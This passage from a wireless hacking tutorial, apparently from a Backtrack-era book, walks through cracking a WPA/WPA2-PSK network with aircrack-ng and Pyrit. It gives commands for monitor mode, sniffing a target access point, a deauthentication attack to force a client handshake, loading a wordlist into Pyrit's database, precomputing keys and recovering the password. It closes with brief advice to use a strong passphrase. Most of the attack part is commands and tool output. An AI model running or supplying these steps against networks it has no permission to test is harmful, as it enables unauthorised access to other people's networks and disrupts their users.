The next type of attack that I’ll cover is a type of attack where you can import many dictionaries to a database and then perform an attack with all the imported. So first let’s install a suite called pyrit because it is not included in Backtrack.
Installing pyrit
Do the following at the terminal:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn
Ok, now you have Pyrit installed and it should be up and running.
I will be use Pyrit with aircrack-ng.
So first of all, put the wireless card in monitor. Let’s use aircrack-ng suite until we got the handshake.
First use:
#airmon-ng start wlan0 Then use:
#airodump-ng wlan0
52
So at this point you should get all the information about the network you will try to attack. For this example we will attack a WPA encrypted network with WLAN as the ESSID, 00:80:5A:28:B5:AB as the BSSID and working in channel 11.
Now we should begin sniffing only this network by using the following command:
#airodump-ng –bssid 00:80:5A:28:B5:AB –c 11 -2 wpahandshake wlan0
This will sniff the packets from WLAN and save them in a file called wpahandshake.
Once again I remember that we will be looking for the *.cap file in the end.
If a client is connected to the network make a deauthentication attack so the client needs to re-authenticate and you get the handshake or if no one is connected, wait for someone to do it.
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1
Now that you have the handshake, let’s use pyrit.
Let’s analyze our handshake file, use the following command in the command line:
#pyrit wpahandshake*.cap analyze
Note that wpahandshake*.cap is the name of the files that airodump-ng save with packets sniffed from the “victims” network, they could be wpahandshake-01.cap, wpahandshake-02.cap…
You should get a window like this:
53
The output is that the Access Point have the mac 00:80:5A:28:B5:AB with WLAN as the ESSID.
It also says that the file captured an handshake from the client with mac address 00:15:AF:A2:8D:98.
So now let’s start working with Pyrit’s database.
As you may know guessing the password used in WPA-PSK and WPA2-PSK is a computational intensive task. During this process, 100% of your CPU is being used to compute what is known as the Pairwise Master Key, a 256bit key derived from the ESSID and a Password using the PBKDF2-HMAC-SHA1 algorithm. One of the major weaknesses of the WPA-PSK is that the Pairwise Master Key has no elements that are unique to the moment of the key-negotiation between Access Point and Sation. It is therefore possible to pre-compute the Pairwise Master Key and store it for later use.
This is where Pyrit’s database kicks in. It can store ESSIDs, passwords and their corresponding Pairwise Master Keys, possibly growing to the size of hundreds of millions of entries. Starting with a fresh installation of Pyrit, your database will most probably be empty.
Issue the following command to get an overview:
#pyrit eval
And you will get this output:
root@bt:~# pyrit eval
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
54
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0
Let’s use a command to import some passwords to our database:
#pyrit –i /pentest/passwords/wordlists/wordlist.txt import_passwords
Note that “/pentest/passwords/wordlists/wordlist.txt” is the path where I have stored a wordlist, you can use dozens of dictionary files, pyrit ensures that duplicate passwords are not stored again in the database, it also doesn’t store passwords that are not suitable as a WPA/WPA2 password.
After you imported the passwords to the database, use this command again:
#pyrit eval
You should get an output like this:
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 989532
Now that we have some passwords in the database, we have to create an ESSID, for that, use the following command:
#pyrit –e WLAN create_essid
Note that WLAN is our “victims” ESSID
Pyrit output will say that ESSID WLAN was created successfully and if you use the
“eval” command again it will show you that WLAN’s ESSID don’t have any password pre-computed.
So we have already some passwords in the database, and we have an ESSID created, we need to pre-compute the passwords to use with that ESSID. This process could take some minutes. It depends on how many passwords you have imported to the database.
To pre-compute the passwords with the ESSID you just created use this command:
#pyrit batch
Pyrit will give the output “Batchprocessing done” when it completes the process.
We can now use the Pairwise Master Keys stored in the database to attack the same handshake as in the example above. Instead of running a “passthrough-attack”, where the database is not touched at all, we issue a “database-attack” like the following:
55
#pyrit –r wpahandshake*.cap attack_db
Don’t forget that wpahandshake*.cap is the file where the handshake is stored and that
“-r” parameter tells pyrit to read the file wpahandshake*.cap. So you should have the following output.
This process is much faster than a dictionary attack, as you can see the image above Pyrit was trying 515375 passwords per second and gave us in the output that the password is “security”. This process only takes more time pre-computing the passwords with the ESSID, but will be useful when you have to use many dictionaries at the same time.
Alright, I’ve been telling you to use WPA and still it
got hacked. However it would take ages to hack a
good PSK with a HUGE dictionary. So always use a
strong password.
56